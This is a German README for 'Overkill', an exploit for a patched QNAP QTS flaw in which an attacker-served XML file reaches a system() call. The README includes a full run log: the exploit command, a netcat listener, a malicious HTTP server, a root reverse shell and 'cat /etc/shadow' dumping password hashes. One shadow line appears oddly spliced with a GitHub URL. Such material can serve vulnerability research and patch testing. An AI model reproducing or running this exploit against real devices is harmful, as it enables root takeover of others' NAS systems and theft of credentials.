
QNAP N-Day (Wahrscheinlich nicht CVE-2020-2509)
Overkill ist ein Exploit für eine gepatchte Sicherheitslücke, die QNAP QTS betrifft. Aufgrund der Art und Weise, wie QNAP Sicherheitslücken offenlegt, bin ich mir nicht sicher, ob dieses Problem eine CVE hat oder nicht. Es wurde jedoch wahrscheinlich im November 2020 und April 2021 gepatcht. Der N-Day wurde bei einer Diff-Analyse für CVE-2020-2509 „entdeckt“. Dies ist mit ziemlicher Sicherheit nicht CVE-2020-2509.
Der Exploit sendet HTTP-GET-Anfragen an /cgi-bin/qnapmsg.cgi?lang=xxx, wodurch nicht gepatchte QNAP-Geräte eine XML-Datei von update.qnap.com über unsicheres HTTP herunterladen. Ein Angreifer, der update.qnap.com auf sich selbst umleiten kann, kann mit einer vom Angreifer kontrollierten XML-Datei antworten. Wenn das QNAP-Gerät die XML-Datei parst, übergibt es einen Teil des Inhalts an einen system-Aufruf, was zu einer Reverse-Shell führt.
Dieser Exploit implementiert nicht die Methode, um Anfragen an update.qnap.com zum Exploit umzuleiten. Im folgenden Beispiel habe ich DNS-Hijacking am Router auf meinem eigenen Router verwendet ... deine Ergebnisse können abweichen.
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252
01001001001000000110001101100001011011100010011101110100001000000110011101100101
______ ___ ___ _______ _______ __ ___ __ ___ ___
/ " \|" \ /" |/" "| /" \ |/"| / ") |" \ |" | |" |
// ____ \\ \ // /(: ______)|: |(: |/ / || | || | || |
/ / ) :)\\ \/. ./ \/ | |_____/ )| __/ |: | |: | |: |
(: (____/ // \. // // ___)_ // / (// _ \ |. | \ |___ \ |___
\ / \\ / (: "||: __ \ |: | \ \ /\ |\( \_|: \( \_|: \
\"_____/ \__/ \_______)|__| \___)(__| \__)(__\_|_)\_______)\_______)
01110100001000000111010001101111001000000111001101101100011001010110010101110000
🦞 jbaines-r7
[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:https://raw.githubusercontent.com/jbaines-r7/overkill/main/!:19181:0:99999:7:::
bash-3.2# exit